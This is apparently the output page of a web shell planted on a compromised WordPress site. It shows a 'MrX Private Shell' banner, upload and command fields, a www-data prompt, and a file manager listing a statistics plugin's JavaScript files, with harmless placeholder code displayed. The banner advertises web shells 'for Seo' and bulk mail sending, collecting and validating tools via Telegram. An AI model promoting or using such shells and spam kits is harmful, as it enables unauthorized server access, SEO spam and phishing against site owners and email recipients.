__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
/**
 * Default PlaceHolder if Custom MetaBox have not this Method
 */
wps_js.placeholder = function (html = false) {
    return `
<div class="wps-ph-item">
    <div class="wps-ph-col-12">
        ${wps_js.placeholder_content('picture')}
        ${wps_js.placeholder_content('line')}
    </div>
    ` + (html !== false ? html : '') + `
</div>
`;
};

/**
 * Line Placeholder
 */
wps_js.line_placeholder = function (number = 1) {
    let html = `<div class="wps-ph-item">`;
    for (let i = 0; i < number; i++) {
        html += `
                <div class="wps-ph-col-12">
                   <div class="wps-ph-row">
                    <div class="wps-ph-col-6 big"></div>
                    <div class="wps-ph-col-4 empty big"></div>
                    <div class="wps-ph-col-4"></div>
                    <div class="wps-ph-col-8 empty"></div>
                    <div class="wps-ph-col-6"></div>
                    <div class="wps-ph-col-6 empty"></div>
                    <div class="wps-ph-col-12"></div>
                     </div>
                </div>
            `;
    }
    html += `</div>`;
    return html;
};

/**
 * Default Circle PlaceHolder
 */
wps_js.rectangle_placeholder = function (cls = '') {
    return `
<div class="wps-ph-item` + (cls.length > 0 ? ' ' + cls : '') + `">
    <div class="wps-ph-col-12">
        ${wps_js.placeholder_content('picture')}
    </div>
</div>
`;
};

/**
 * Type Of Place Holder Content
 *
 * @param type
 */
wps_js.placeholder_content = function (type = 'line') {

    // Create Empty Html
    let html = '';
    switch (type) {
        case "picture": {
            html = `<div class="wps-ph-picture"></div>`;
            break;
        }
        case "line": {
            html = `<div class="wps-ph-row">
                    <div class="wps-ph-col-6 big"></div>
                    <div class="wps-ph-col-4 empty big"></div>
                    <div class="wps-ph-col-2 big"></div>
                    <div class="wps-ph-col-4"></div>
                    <div class="wps-ph-col-8 empty"></div>
                    <div class="wps-ph-col-6"></div>
                    <div class="wps-ph-col-6 empty"></div>
                    <div class="wps-ph-col-12"></div>
                     </div>`;
            break;
        }
        case "circle": {
            html = `<div class="wps-ph-col-2"></div>
                    <div class="wps-ph-col-8">
                        <div class="wps-ph-avatar"></div>
                    </div>`;
            break;
        }
        default: {
            break;
        }
    }

    return html;
};

Filemanager

Name Type Size Permission Actions
Tinymce Folder 0755
components Folder 0755
filters Folder 0755
meta-box Folder 0755
pages Folder 0755
plugin Folder 0755
ajax.js File 2.94 KB 0644
background-process-tracker.js File 3.51 KB 0644
chart.js File 49.86 KB 0644
config.js File 416 B 0644
event-tracker.js File 8.2 KB 0644
helper.js File 20.56 KB 0644
image-upload.js File 2.29 KB 0644
meta-box.js File 19.79 KB 0644
mini-chart.js File 1.67 KB 0644
placeholder.js File 2.53 KB 0644
run.js File 363 B 0644
tracker.js File 3 KB 0644
user-tracker.js File 6.24 KB 0644
Filemanager